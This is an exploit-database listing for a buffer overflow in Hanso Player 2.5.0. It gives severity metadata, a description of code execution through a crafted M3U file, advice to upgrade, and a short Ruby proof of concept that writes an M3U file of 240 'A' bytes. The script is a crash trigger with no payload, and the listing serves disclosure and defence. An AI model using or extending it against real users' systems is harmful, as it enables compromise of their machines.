header-logo
Suggest Exploit
vendor:
Hanso Player
by:
Necmettin COSKUN
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Hanso Player
Affected Version From: 2.5.0
Affected Version To: 2.5.0
Patch Exists: YES
Related CWE: N/A
CPE: a:hansotools:hanso_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2020

Hanso Player 2.5.0 Buffer Overflow

Hanso Player 2.5.0 is vulnerable to a buffer overflow vulnerability due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by crafting a malicious M3U file and convincing the user to open it, resulting in arbitrary code execution.

Mitigation:

Upgrade to the latest version of Hanso Player
Source

Exploit-DB raw data:

#!/usr/bin/env ruby
# coding:UTF-8
# Exploit Title:Hanso Player 2.5.0 Buffer Overflow
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Vendor :www.hansotools.com
# Software link:http://www.hansotools.com/downloads/hanso-player-setup.exe
# version: 2.5.0
# Tested on: windows XP sp2

DENEME = "\x41" * 240

File.open('hanzo.m3u', 'w') do |bofdosya|  
bofdosya.puts (DENEME)
bofdosya.close()
end

Navigation

Suggest Exploit

Services By CQR